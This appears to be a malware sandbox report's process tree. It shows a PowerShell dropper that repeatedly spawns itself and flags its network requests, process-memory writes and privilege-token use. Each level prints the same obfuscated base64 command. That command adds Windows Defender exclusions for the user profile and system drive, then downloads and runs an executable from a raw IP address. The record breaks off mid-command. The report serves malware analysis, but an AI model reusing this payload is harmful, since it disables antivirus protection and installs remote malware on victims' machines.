C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="10⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"11⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="12⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="14⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="16⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"17⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="18⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="20⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"21⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="22⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"23⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="24⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"25⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="26⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"27⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="28⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="30⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"31⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand 